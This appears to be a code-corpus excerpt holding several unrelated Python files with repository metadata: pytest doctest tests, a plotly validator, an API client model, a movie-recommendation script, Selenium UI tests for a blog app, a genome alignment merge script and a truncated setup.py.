'12' ''' """.format(comment=comment)) reprec = testdir.inline_run("--doctest-modules") reprec.assertoutcome(passed=2) @pytest.mark.parametrize('config_mode', ['ini', 'comment']) def test_allow_bytes(self, testdir, config_mode): """Test that doctests which output bytes work in all python versions tested by pytest when the ALLOW_BYTES option is used (either in the ini file or by an inline comment)(#1287). """ if config_mode == 'ini': testdir.makeini(''' [pytest] doctest_optionflags = ALLOW_BYTES ''') comment = '' else: comment = '#doctest: +ALLOW_BYTES' testdir.maketxtfile(test_doc=""" >>> b'foo' {comment} 'foo' """.format(comment=comment)) testdir.makepyfile(foo=""" def foo(): ''' >>> b'foo' {comment} 'foo' ''' """.format(comment=comment)) reprec = testdir.inline_run("--doctest-modules") reprec.assertoutcome(passed=2) def test_unicode_string(self, testdir): """Test that doctests which output unicode fail in Python 2 when the ALLOW_UNICODE option is not used. The same test should pass in Python 3. """ testdir.maketxtfile(test_doc=""" >>> b'12'.decode('ascii') '12' """) reprec = testdir.inline_run() passed = int(sys.version_info[0] >= 3) reprec.assertoutcome(passed=passed, failed=int(not passed)) def test_bytes_literal(self, testdir): """Test that doctests which output bytes fail in Python 3 when the ALLOW_BYTES option is not used. The same test should pass in Python 2 (#1287). """ testdir.maketxtfile(test_doc=""" >>> b'foo' 'foo' """) reprec = testdir.inline_run() passed = int(sys.version_info[0] == 2) reprec.assertoutcome(passed=passed, failed=int(not passed)) class TestDoctestSkips(object): """ If all examples in a doctest are skipped due to the SKIP option, then the tests should be SKIPPED rather than PASSED. (#957) """ @pytest.fixture(params=['text', 'module']) def makedoctest(self, testdir, request): def makeit(doctest): mode = request.param if mode == 'text': testdir.maketxtfile(doctest) else: assert mode == 'module' testdir.makepyfile('"""\n%s"""' % doctest) return makeit def test_one_skipped(self, testdir, makedoctest): makedoctest(""" >>> 1 + 1 # doctest: +SKIP 2 >>> 2 + 2 4 """) reprec = testdir.inline_run("--doctest-modules") reprec.assertoutcome(passed=1) def test_one_skipped_failed(self, testdir, makedoctest): makedoctest(""" >>> 1 + 1 # doctest: +SKIP 2 >>> 2 + 2 200 """) reprec = testdir.inline_run("--doctest-modules") reprec.assertoutcome(failed=1) def test_all_skipped(self, testdir, makedoctest): makedoctest(""" >>> 1 + 1 # doctest: +SKIP 2 >>> 2 + 2 # doctest: +SKIP 200 """) reprec = testdir.inline_run("--doctest-modules") reprec.assertoutcome(skipped=1) def test_vacuous_all_skipped(self, testdir, makedoctest): makedoctest('') reprec = testdir.inline_run("--doctest-modules") reprec.assertoutcome(passed=0, skipped=0) class TestDoctestAutoUseFixtures(object): SCOPES = ['module', 'session', 'class', 'function'] def test_doctest_module_session_fixture(self, testdir): """Test that session fixtures are initialized for doctest modules (#768) """ # session fixture which changes some global data, which will # be accessed by doctests in a module testdir.makeconftest(""" import pytest import sys @pytest.yield_fixture(autouse=True, scope='session') def myfixture(): assert not hasattr(sys, 'pytest_session_data') sys.pytest_session_data = 1 yield del sys.pytest_session_data """) testdir.makepyfile(foo=""" import sys def foo(): ''' >>> assert sys.pytest_session_data == 1 ''' def bar(): ''' >>> assert sys.pytest_session_data == 1 ''' """) result = testdir.runpytest("--doctest-modules") result.stdout.fnmatch_lines('*2 passed*') @pytest.mark.parametrize('scope', SCOPES) @pytest.mark.parametrize('enable_doctest', [True, False]) def test_fixture_scopes(self, testdir, scope, enable_doctest): """Test that auto-use fixtures work properly with doctest modules. See #1057 and #1100. """ testdir.makeconftest(''' import pytest @pytest.fixture(autouse=True, scope="{scope}") def auto(request): return 99 '''.format(scope=scope)) testdir.makepyfile(test_1=''' def test_foo(): """ >>> getfixture('auto') + 1 100 """ def test_bar(): assert 1 ''') params = ('--doctest-modules',) if enable_doctest else () passes = 3 if enable_doctest else 2 result = testdir.runpytest(*params) result.stdout.fnmatch_lines(['*=== %d passed in *' % passes]) @pytest.mark.parametrize('scope', SCOPES) @pytest.mark.parametrize('autouse', [True, False]) @pytest.mark.parametrize('use_fixture_in_doctest', [True, False]) def test_fixture_module_doctest_scopes(self, testdir, scope, autouse, use_fixture_in_doctest): """Test that auto-use fixtures work properly with doctest files. See #1057 and #1100. """ testdir.makeconftest(''' import pytest @pytest.fixture(autouse={autouse}, scope="{scope}") def auto(request): return 99 '''.format(scope=scope, autouse=autouse)) if use_fixture_in_doctest: testdir.maketxtfile(test_doc=""" >>> getfixture('auto') 99 """) else: testdir.maketxtfile(test_doc=""" >>> 1 + 1 2 """) result = testdir.runpytest('--doctest-modules') assert 'FAILURES' not in str(result.stdout.str()) result.stdout.fnmatch_lines(['*=== 1 passed in *']) @pytest.mark.parametrize('scope', SCOPES) def test_auto_use_request_attributes(self, testdir, scope): """Check that all attributes of a request in an autouse fixture behave as expected when requested for a doctest item. """ testdir.makeconftest(''' import pytest @pytest.fixture(autouse=True, scope="{scope}") def auto(request): if "{scope}" == 'module': assert request.module is None if "{scope}" == 'class': assert request.cls is None if "{scope}" == 'function': assert request.function is None return 99 '''.format(scope=scope)) testdir.maketxtfile(test_doc=""" >>> 1 + 1 2 """) result = testdir.runpytest('--doctest-modules') assert 'FAILURES' not in str(result.stdout.str()) result.stdout.fnmatch_lines(['*=== 1 passed in *']) class TestDoctestNamespaceFixture(object): SCOPES = ['module', 'session', 'class', 'function'] @pytest.mark.parametrize('scope', SCOPES) def test_namespace_doctestfile(self, testdir, scope): """ Check that inserting something into the namespace works in a simple text file doctest """ testdir.makeconftest(""" import pytest import contextlib @pytest.fixture(autouse=True, scope="{scope}") def add_contextlib(doctest_namespace): doctest_namespace['cl'] = contextlib """.format(scope=scope)) p = testdir.maketxtfile(""" >>> print(cl.__name__) contextlib """) reprec = testdir.inline_run(p) reprec.assertoutcome(passed=1) @pytest.mark.parametrize('scope', SCOPES) def test_namespace_pyfile(self, testdir, scope): """ Check that inserting something into the namespace works in a simple Python file docstring doctest """ testdir.makeconftest(""" import pytest import contextlib @pytest.fixture(autouse=True, scope="{scope}") def add_contextlib(doctest_namespace): doctest_namespace['cl'] = contextlib """.format(scope=scope)) p = testdir.makepyfile(""" def foo(): ''' >>> print(cl.__name__) contextlib ''' """) reprec = testdir.inline_run(p, "--doctest-modules") reprec.assertoutcome(passed=1) class TestDoctestReportingOption(object): def _run_doctest_report(self, testdir, format): testdir.makepyfile(""" def foo(): ''' >>> foo() a b 0 1 4 1 2 4 2 3 6 ''' print(' a b\\n' '0 1 4\\n' '1 2 5\\n' '2 3 6') """) return testdir.runpytest("--doctest-modules", "--doctest-report", format) @pytest.mark.parametrize('format', ['udiff', 'UDIFF', 'uDiFf']) def test_doctest_report_udiff(self, testdir, format): result = self._run_doctest_report(testdir, format) result.stdout.fnmatch_lines([ ' 0 1 4', ' -1 2 4', ' +1 2 5', ' 2 3 6', ]) def test_doctest_report_cdiff(self, testdir): result = self._run_doctest_report(testdir, 'cdiff') result.stdout.fnmatch_lines([ ' a b', ' 0 1 4', ' ! 1 2 4', ' 2 3 6', ' --- 1,4 ----', ' a b', ' 0 1 4', ' ! 1 2 5', ' 2 3 6', ]) def test_doctest_report_ndiff(self, testdir): result = self._run_doctest_report(testdir, 'ndiff') result.stdout.fnmatch_lines([ ' a b', ' 0 1 4', ' - 1 2 4', ' ? ^', ' + 1 2 5', ' ? ^', ' 2 3 6', ]) @pytest.mark.parametrize('format', ['none', 'only_first_failure']) def test_doctest_report_none_or_only_first_failure(self, testdir, format): result = self._run_doctest_report(testdir, format) result.stdout.fnmatch_lines([ 'Expected:', ' a b', ' 0 1 4', ' 1 2 4', ' 2 3 6', 'Got:', ' a b', ' 0 1 4', ' 1 2 5', ' 2 3 6', ]) def test_doctest_report_invalid(self, testdir): result = self._run_doctest_report(testdir, 'obviously_invalid_format') result.stderr.fnmatch_lines([ "*error: argument --doctest-report: invalid choice: 'obviously_invalid_format' (choose from*" ])
32.386454
105
0.490405
ff1e90e1472653bd3368e620345df18e0e561371
654
py
Python
MultielementPolynomial/src/main.py
LonelySteve/data-structure-and-algorithms-tasks
4698a5030d8c3c9093933e37e3247e4c76d8d895
[ "MIT" ]
1
2019-04-17T00:18:13.000Z
2019-04-17T00:18:13.000Z
MultielementPolynomial/src/main.py
LonelySteve/data-structure-and-algorithms-tasks
4698a5030d8c3c9093933e37e3247e4c76d8d895
[ "MIT" ]
null
null
null
MultielementPolynomial/src/main.py
LonelySteve/data-structure-and-algorithms-tasks
4698a5030d8c3c9093933e37e3247e4c76d8d895
[ "MIT" ]
null
null
null
from MultielementPolynomial.src.parser.parser import Parser from MultielementPolynomial.src.mplist import get_mp_struct, convert def main(): expr_1 = "8*x^9+5*x^8*y^7+3*x^4*y^4+6*y^2-5" expr_2 = "6*x^5*y^4+7*x^3*y^2+21*x*y^2+8" p_1 = Parser(expr_1) ex_1 = p_1.parse() vars_1 = list(ex_1.vars) value_1 = ex_1.get_value() print(get_mp_struct(value_1, vars_1)) p_2 = Parser(expr_2) ex_2 = p_2.parse() vars_2 = list(ex_2.vars) value_2 = ex_2.get_value() print(get_mp_struct(value_2, vars_2)) mp_1 = convert(ex_1) mp_2 = convert(ex_2) print(mp_1 * mp_2) if __name__ == '__main__': main()
23.357143
68
0.646789
321a2b976f77f6d80094268622882fae99820723
427
py
Python
packages/python/plotly/plotly/validators/bar/_ids.py
mastermind88/plotly.py
efa70710df1af22958e1be080e105130042f1839
[ "MIT" ]
null
null
null
packages/python/plotly/plotly/validators/bar/_ids.py
mastermind88/plotly.py
efa70710df1af22958e1be080e105130042f1839
[ "MIT" ]
null
null
null
packages/python/plotly/plotly/validators/bar/_ids.py
mastermind88/plotly.py
efa70710df1af22958e1be080e105130042f1839
[ "MIT" ]
null
null
null
import _plotly_utils.basevalidators class IdsValidator(_plotly_utils.basevalidators.DataArrayValidator): def __init__(self, plotly_name="ids", parent_name="bar", **kwargs): super(IdsValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, anim=kwargs.pop("anim", True), edit_type=kwargs.pop("edit_type", "calc"), **kwargs, )
32.846154
71
0.644028
dc04af8c4672908cae13c830079b386c48ea12c1
4,737
py
Python
sib_api_v3_sdk/models/get_contacts.py
tarraschk/APIv3-python-library
440883d3a7ca503a655f16bf69cef6c122a95e01
[ "MIT" ]
46
2018-12-18T21:37:18.000Z
2022-03-30T20:38:29.000Z
sib_api_v3_sdk/models/get_contacts.py
tarraschk/APIv3-python-library
440883d3a7ca503a655f16bf69cef6c122a95e01
[ "MIT" ]
41
2018-03-02T13:22:48.000Z
2021-11-25T04:32:03.000Z
sib_api_v3_sdk/models/get_contacts.py
tarraschk/APIv3-python-library
440883d3a7ca503a655f16bf69cef6c122a95e01
[ "MIT" ]
45
2018-01-22T14:42:32.000Z
2021-12-16T19:58:45.000Z
# coding: utf-8 """ SendinBlue API SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable | # noqa: E501 OpenAPI spec version: 3.0.0 Contact: contact@sendinblue.com Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six class GetContacts(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'contacts': 'list[object]', 'count': 'int' } attribute_map = { 'contacts': 'contacts', 'count': 'count' } def __init__(self, contacts=None, count=None): # noqa: E501 """GetContacts - a model defined in Swagger""" # noqa: E501 self._contacts = None self._count = None self.discriminator = None self.contacts = contacts self.count = count @property def contacts(self): """Gets the contacts of this GetContacts. # noqa: E501 :return: The contacts of this GetContacts. # noqa: E501 :rtype: list[object] """ return self._contacts @contacts.setter def contacts(self, contacts): """Sets the contacts of this GetContacts. :param contacts: The contacts of this GetContacts. # noqa: E501 :type: list[object] """ if contacts is None: raise ValueError("Invalid value for `contacts`, must not be `None`") # noqa: E501 self._contacts = contacts @property def count(self): """Gets the count of this GetContacts. # noqa: E501 Number of contacts # noqa: E501 :return: The count of this GetContacts. # noqa: E501 :rtype: int """ return self._count @count.setter def count(self, count): """Sets the count of this GetContacts. Number of contacts # noqa: E501 :param count: The count of this GetContacts. # noqa: E501 :type: int """ if count is None: raise ValueError("Invalid value for `count`, must not be `None`") # noqa: E501 self._count = count def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(GetContacts, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, GetContacts): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
32.445205
856
0.568292
79e26c86be889bbedce90f1f952afa1e472f6872
3,302
py
Python
backend/suggestion/algo_genre.py
PierreSanson/centrale
45bf1944c46f22f21b018bd19d8c3b504548d25f
[ "MIT" ]
null
null
null
backend/suggestion/algo_genre.py
PierreSanson/centrale
45bf1944c46f22f21b018bd19d8c3b504548d25f
[ "MIT" ]
null
null
null
backend/suggestion/algo_genre.py
PierreSanson/centrale
45bf1944c46f22f21b018bd19d8c3b504548d25f
[ "MIT" ]
null
null
null
import numpy as np from get_dictionaries import * import pandas as pd def meilleur_score(d,n): liste=[] new_d={} for k, v in sorted(d.items(), key=lambda x: x[1]): liste.append([k,v]) liste.reverse() for i in range(n): new_d[liste[i][0]]=liste[i][1] return new_d def average_popular(movies,movie): n=len(movies[movie]['ratings']) if n<20: return 0 average=sum([float(movies[movie]['ratings'][rating]) for rating in movies[movie]['ratings']]) return average/n def best_average_per_genre(movies): genres={} for movie in movies: movie_genres=movies[movie]['genre'] movie_genres=movie_genres.split('|') for genre in movie_genres: if genre in genres: genres[genre][movies[movie]['Name_Year']]=average_popular(movies,movie) #a def else: genres[genre]={} genres[genre][movies[movie]['Name_Year']]=average_popular(movies,movie) return genres def suggestion(user,dic_users,movies,average_genres): dic_user=dic_users[user] #Cherche le genre favori de l'utilisateur genres={} for movie in dic_user: if float(dic_user[movie])>=4: id=[key for key in movies if movies[key]['Name_Year']==movie] if len(id)==1: genre=movies[id[0]]['genre'] genre=genre.split('|') for word in genre : if word in genres: genres[word]+=1 else: genres[word]=1 best_genre=[key for key in meilleur_score(genres,1)][0] print(best_genre) suggestion=average_genres[best_genre] for movie in dic_user: if movie in suggestion: del suggestion[movie] suggestion= meilleur_score(suggestion,10) #Transformer les données en dataframe Panda result={'movies':[],'score':[]} for movie in suggestion: result['movies'].append(movie) result['score'].append(suggestion[movie]) result['movies'].append(best_genre) result['score'].append('0') result=pd.DataFrame(result) #Créer objet de type JSON result.to_json ('.\Genre_p.json') return result dic_users['josephine']={'The Boss Baby (2017)':'4.5','Coco (2017)':'3.5', 'Shrek the Third (2007)':'4.5','Incredibles 2 (2018)':'4','Princess and the Frog, The (2009)':'5','Finding Nemo (2003)':'4','WALL·E (2008)':'4'} dic_users['victor']={'Howl`s Moving Castle (Hauru no ugoku shiro) (2004)':'3','Pom Poko (a.k.a. Raccoon War, The) (Heisei tanuki gassen pompoko) (1994)':'4.5','My Neighbor Totoro (Tonari no Totoro) (1988)':'4','Spirited Away (Sen to Chihiro no kamikakushi) (2001)':'5','Your Name. (2016)':'5',"Kiki's Delivery Service (Majo no takkyûbin) (1989)":'3.5',} dic_users['pierre']={'Spider-Man 2 (2004)':'4','Inception (2010)':'4','Captain America: The First Avenger (2011)':'3.5','Superman/Batman: Public Enemies (2009)':'2','Star Wars: The Last Jedi (2017)':'4.5', 'Matrix Reloaded, The (2003)':'4','Lord of the Rings: The Return of the King, The (2003)':'3','Avengers: Infinity War - Part I (2018)':'5', 'Iron Man 3 (2013)':'3.5','Thor: Ragnarok (2017)':'5',} print(suggestion('josephine',dic_users,movies,best_average_per_genre(movies)))
40.765432
401
0.61811
028fd31cc5e83cc82f56c9c03f08a47797f72754
8,484
py
Python
testproject/pytests/test_blog_post.py
Bebe-ops/conduit
e06d78ebe9ca72595ddef0f5c7fcfd2868a5fa08
[ "MIT" ]
null
null
null
testproject/pytests/test_blog_post.py
Bebe-ops/conduit
e06d78ebe9ca72595ddef0f5c7fcfd2868a5fa08
[ "MIT" ]
null
null
null
testproject/pytests/test_blog_post.py
Bebe-ops/conduit
e06d78ebe9ca72595ddef0f5c7fcfd2868a5fa08
[ "MIT" ]
null
null
null
from selenium import webdriver from webdriver_manager.chrome import ChromeDriverManager from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC import time from random import randint from selenium.webdriver.chrome.options import Options options = Options() options.headless = True driver = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=options) def locator(xp): element = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, xp))) return element def locators(xp): element = WebDriverWait(driver, 5).until(EC.visibility_of_all_elements_located((By.XPATH, xp))) return element def fill_input_fields_and_send(my_list, field_list, btn): for _ in range(len(my_list)): field_list[_].send_keys(my_list[_]) btn.click() def compare_two_lists(real_list, expected_list, attr): for _ in range(len(real_list)): assert real_list[_].get_attribute(attr) == expected_list[_] def create_text_list(real_list, new_list): for _ in real_list: new_list.append(_.text) # locators form_input_fields_xp = '//form/fieldset//fieldset//input' textarea_xp = '//fieldset/textarea' publish_btn_xp = '//form/button' home_link_xp = '//nav/div/ul/li/a[contains(text(), "Home")]' global_feed_list_xp = '//div[@class="home-global"]//a[@class="preview-link"]/h1' all_pages_link_xp = '//nav/ul/li[@class="page-item"]/a' logout_xp = '//*[@id="app"]/nav/div/ul/li[5]/a[@active-class="active"]' # ------------------------------------------------------------------------------------------ # A011_CON_TC10_Új blogbejegyzés (minden mező kitöltése) def test_new_blog(): url = "http://localhost:1667" driver.get(url) time.sleep(2) # successful registration registration_xp = '//li[@class="nav-item"]/a[@href="#/register"]' reg_input_fields_xp = '//input' sign_up_btn_xp = '//button[contains(text(),"Sign up")]' notice_btn_xp = '//div[@class="swal-button-container"]/button' new_article_xp = '//a[@href="#/editor"]' random_user = f"Hose{randint(1, 100)}" reg_input_data = [random_user, f"{random_user}@gmail.com", "12ABab@&"] locator(registration_xp).click() locators(reg_input_fields_xp) # registration and save login data in file login_data = [] for _ in range(len(reg_input_data)): locators(reg_input_fields_xp)[_].send_keys(reg_input_data[_]) for _ in locators(reg_input_fields_xp)[1:]: login_data.append(_.get_attribute("value")) with open("login_data.txt", "w") as login_file: # write data_list in file for item in login_data: login_file.write("%s\n" % item) locator(sign_up_btn_xp).click() time.sleep(2) locator(notice_btn_xp).click() # create new blog_post expect_elements_placeholder = ["Article Title", "What's this article about?", "Write your article (in markdown)", "Enter tags"] random_blog_n = randint(1, 100) blog_test_data = [f'Summer{random_blog_n}', f'Sun{random_blog_n}', "There are many variations of passages of Lorem Ipsum available, but the majority have suffered " "alteration in some form, by injected humour, or randomised words which don't look even slightly " "believable.", "quality"] blog_title_xp = '//div[@class="container"]/h1' blog_paragraph_xp = '//div[@class="row article-content"]//p' with open('blog_data.txt', "w") as blog_file: # write data_list in file for _ in blog_test_data: blog_file.write("%s\n" % _) locator(new_article_xp).click() form_input_fields = locators(form_input_fields_xp) form_input_fields.insert(2, locator(textarea_xp)) # make full form fields # check placeholders compare_two_lists(form_input_fields, expect_elements_placeholder, "placeholder") # fill in form input fields fill_input_fields_and_send(blog_test_data, form_input_fields, locator(publish_btn_xp)) # check url, blog time.sleep(2) expected_blog = blog_test_data[0] expected_url = f'http://localhost:1667/#/articles/{expected_blog.lower()}' assert driver.current_url == expected_url assert locator(blog_title_xp).text == blog_test_data[0] assert locator(blog_paragraph_xp).text == blog_test_data[2] # check the blog post is included in the global feed list (all pages) locator(home_link_xp).click() locators(global_feed_list_xp) # create_text_list(from global_feed_list to global_posts) global_posts = [] all_pages_link = locators(all_pages_link_xp) for page in all_pages_link: global_feed_list = locators(global_feed_list_xp) create_text_list(global_feed_list, global_posts) page.click() assert blog_test_data[0] in global_posts locator(logout_xp).click() time.sleep(3) # A012_CON_TC13_Meglévő blogbejegyzésem szerkesztése def test_mod_and_del_blog(): url = "http://localhost:1667" driver.get(url) time.sleep(2) # login login_xp = '//*[@id="app"]/nav/div/ul/li[@class="nav-item"]/a[@href="#/login"]' log_input_fields_xp = '//input' sign_in_btn_xp = '//button[contains(text(),"Sign in")]' locator(login_xp).click() # Collect previous login_data login_data = [] with open("login_data.txt", "r") as log_file: content = log_file.readlines() for i in content: login_data.append(i.replace("\n", "")) # login log_input_fields = locators(log_input_fields_xp) fill_input_fields_and_send(login_data, log_input_fields, locator(sign_in_btn_xp)) time.sleep(3) # modified blog my_articles_title_xp = '//div[@class="article-preview"]//a//h1' nav_bar_user_xp = '//*[@id="app"]/nav/div/ul/li[4]/a' blog_data = [] with open("blog_data.txt", "r") as blog_file: # Collect previous blog_data content = blog_file.readlines() for _ in content: blog_data.append(_.replace("\n", "")) user_name = locator(nav_bar_user_xp) user_id_nav_xp = f'//nav//li/a[contains(text(), "{user_name.text}")]' locator(user_id_nav_xp).click() time.sleep(5) # find_my_blog_title my_blog_title = locator(f'{my_articles_title_xp}[contains(text(), "{blog_data[0]}")]') my_blog_title.click() # edit blog article_page_h1_xp = '//div[@class="container"]/h1' edit_btn_xp = '//div//span//a//span[contains(text(), "Edit Article")]' mod_test_data = ["test modify", " Sun", "Sunny. Yesterday my life was fill the rain.", "sun"] locator(edit_btn_xp).click() form_input_fields = locators(form_input_fields_xp) form_input_fields.insert(2, locator(textarea_xp)) # make full form fields for _ in range(len(mod_test_data)): form_input_fields[_].clear() if form_input_fields[_].get_attribute("placeholder") == "Enter tags": locator('//div//i[@class="ti-icon-close"]').click() form_input_fields[_].send_keys(mod_test_data[_]) locator(publish_btn_xp).click() # check blog assert locator(article_page_h1_xp).text == mod_test_data[0] # A012_CON_TC14_Meglévő blogbejegyzésem törlése time.sleep(3) delete_btn_xp = '//div/span/button[@class="btn btn-outline-danger btn-sm"]' your_feed_xp = '//div[@class="feed-toggle"]/ul/li[1]/a[contains(text(), "Your Feed")]' your_feed_list_xp = '//div[@class="home-my-feed"]//a[@class="preview-link"]/h1' locator(delete_btn_xp).click() # check delete blog in global feeds time.sleep(3) locator(home_link_xp).click() locators(global_feed_list_xp) # create_text_list(from global_feed_list to global_posts) global_posts = [] all_pages_link = locators(all_pages_link_xp) for page in all_pages_link: global_feed_list = locators(global_feed_list_xp) create_text_list(global_feed_list, global_posts) page.click() time.sleep(5) assert not mod_test_data[0] in global_posts # check delete blog in your feeds locator(your_feed_xp).click() your_posts = [] all_pages_link = locators(all_pages_link_xp) for _ in all_pages_link: your_feed_list = locators(your_feed_list_xp) create_text_list(your_feed_list, your_posts) _.click() time.sleep(5) assert not mod_test_data[0] in your_posts locator(logout_xp).click()
35.797468
120
0.6814
355497f855a5610e465ee945f6f0c2e91bfa5610
6,198
py
Python
maf_merge_from_consensus.py
brendane/miscellaneous_bioinfo_scripts
91ca3282823495299e4c68aa79bdc1c0225a6d7b
[ "MIT" ]
null
null
null
maf_merge_from_consensus.py
brendane/miscellaneous_bioinfo_scripts
91ca3282823495299e4c68aa79bdc1c0225a6d7b
[ "MIT" ]
1
2020-09-17T11:14:13.000Z
2020-09-17T11:14:13.000Z
maf_merge_from_consensus.py
brendane/miscellaneous_bioinfo_scripts
91ca3282823495299e4c68aa79bdc1c0225a6d7b
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 """ Merge multi-stage whole genome alignments maf_merge_from_consensus.py --output <output file> <input maf> <input_name:input_file...> """ import argparse import collections from Bio import Seq MafSeq = collections.namedtuple('MafSeq', 'seq_name start aligned_bases strand contig_length seq') def parse_maf(ih, print_line=False, handle=None): record = {'a':{}, 's':{}} for line in ih: if print_line: handle.write(line) if line.startswith('a'): if len(record['s']) > 0: yield record record = {'a':{}, 's':{}} record['a'] = {x.split('=')[0]:x.split('=')[1] for x in line.strip().split()[1:]} record['s'] = [] elif line.startswith('s'): fields = line.strip().split()[1:] record['s'].append(MafSeq(fields[0], int(fields[1]), int(fields[2]), fields[3], int(fields[4]), fields[5])) else: continue yield record parser = argparse.ArgumentParser(usage=__doc__) parser.add_argument('--output') parser.add_argument('maf') parser.add_argument('inputs', nargs='+') args = parser.parse_args() ## Goal: ## MAF file with coordinates of individual genomes ## 1. Map between consensus coordinates and individual genome coordinates ## args.inputs = batch_0:results/.../round1-batch.0/processed.maf ## Do this for each seq_name separately to parallelize full_coords = {} contig_lengths = {} individual_contigs = collections.defaultdict(list) for seq_name, maf_file in map(lambda x: x.split(':'), args.inputs): coords = {} # consensus position: genome_position, direction, base with open(maf_file, 'rt') as handle: for rec in parse_maf(handle): label = rec['a']['label'] length = len(rec['s'][0].seq) print(seq_name, label) for i in range(length): # i = consensus position coords[(seq_name + '.' + label, i)] = {} for srec in rec['s']: direction = 1 j = srec.start if srec.strand == '-': direction = -1 j = srec.contig_length - srec.start - 1 for i in range(length): if i == 0: contig_lengths[srec.seq_name] = srec.contig_length individual_contigs[seq_name + '.' + label].append(srec.seq_name) if srec.seq[i] == '-': coords[(seq_name + '.' + label, i)][srec.seq_name] = (None, direction, srec.seq[i]) else: coords[(seq_name + '.' + label, i)][srec.seq_name] = (j, direction, srec.seq[i]) j += direction full_coords[seq_name] = coords ## 2. Walk through alignment of consensuses, substituting in the ## coordinates and bases from the individual genomes ## Do this for ind_seq_name separately to parallelize with open(args.output, 'wt') as oh: with open(args.maf, 'rt') as handle: ## For each LCB in the alignment of consensus genome for rec in parse_maf(handle): label = rec['a']['label'] length = len(rec['s'][0].seq) oh.write('a label=' + label + '\n') ## For each consensus sequence that contributes to this LCB for srec in rec['s']: lcb = srec.seq_name consensus = srec.seq_name.split('.')[0] coords = full_coords[consensus] ## For each individual sequence that is part of the consensus sequence for ind_seq_name in individual_contigs[lcb]: direction = 1 j = srec.start if srec.strand == '-': direction = -1 j = srec.contig_length - srec.start - 1 ind_start = None ind_end = None ind_strand = None # Multiplied by direction of LCB in consensus alignment ind_contig_length = contig_lengths[ind_seq_name] aln_length = 0 sequence = '' ## Loop through each base to figure out start, end, ## strand, and aligned sequence for i in range(length): if srec.seq[i] == '-': sequence += '-' else: ## Matching coordinates: matching = coords[(lcb, j)][ind_seq_name] pos = matching[0] ind_strand = matching[1] bp = matching[2] if direction == -1: bp = Seq.reverse_complement(bp) sequence += bp if bp != '-': aln_length += 1 j += direction if pos is not None and (ind_start is None or ind_start > pos): ind_start = pos if pos is not None and (ind_end is None or ind_end < pos): ind_end = pos ## Print out the record actual_direction = ind_strand * direction if len(set(sequence) - set('-')) == 0: ## Covers entirely a gap region in the non-consensus alignment continue if actual_direction == 1: oh.write('s\t' + ind_seq_name + '\t' + str(ind_start) + '\t' + str(aln_length) + '\t+\t' + str(ind_contig_length) + '\t' + sequence + '\n') else: oh.write('s\t' + ind_seq_name + '\t' + str(ind_contig_length - ind_end) + '\t' + str(aln_length) + '\t-\t' + str(ind_contig_length) + '\t' + sequence + '\n') oh.write('\n') ## 3. Merge all the individual components together if parallelized
42.452055
119
0.495482
b90b1f49a610781c4aad85f09b0d68671b8b54c5
3,825
py
Python
setup.py
vischia/madminer
98c2bcfb93d0fd84ff1872b344c4d89adf51217f
[ "MIT" ]
null
null
null
setup.py
vischia/madminer
98c2bcfb93d0fd84ff1872b344c4d89adf51217f
[ "MIT" ]
null
null
null
setup.py
vischia/madminer
98c2bcfb93d0fd84ff1872b344c4d89adf51217f
[ "MIT" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- # Based on https://github.com/kennethreitz/setup.py # Note: To use the 'upload' functionality of this file, you must: # $ pip install twine import io import os import sys from shutil import rmtree from setuptools import find_packages, setup, Command # Package meta-data. NAME = 'madminer' DESCRIPTION = 'Mining gold from MadGraph to improve limit setting in particle physics.' URL = 'https://github.com/johannbrehmer/madminer' EMAIL = 'johann.brehmer@nyu.edu' AUTHOR = 'Johann Brehmer, Felix Kling, Kyle Cranmer' REQUIRES_PYTHON = '>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, <4' VERSION = '0.1.1' # What packages are required for this module to be executed? REQUIRED = [ "six", "numpy>=1.11.0", "scipy>=1.0.0", "h5py", "scikit-hep", "scikit-learn>=0.19.0", "torch>=0.4.0", "bqplot", "uproot", "matplotlib", ] # What packages are optional? EXTRAS = { # 'fancy feature': ['django'], } # The rest you shouldn't have to touch too much :) # ------------------------------------------------ # Except, perhaps the License and Trove Classifiers! # If you do change the License, remember to change the Trove Classifier for that! here = os.path.abspath(os.path.dirname(__file__)) # Import the README and use it as the long-description. # Note: this will only work if 'README.md' is present in your MANIFEST.in file! try: with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f: long_description = '\n' + f.read() except FileNotFoundError: long_description = DESCRIPTION # Load the package's __version__.py module as a dictionary. about = {} if not VERSION: with open(os.path.join(here, NAME, '__version__.py')) as f: exec(f.read(), about) else: about['__version__'] = VERSION class UploadCommand(Command): """Support 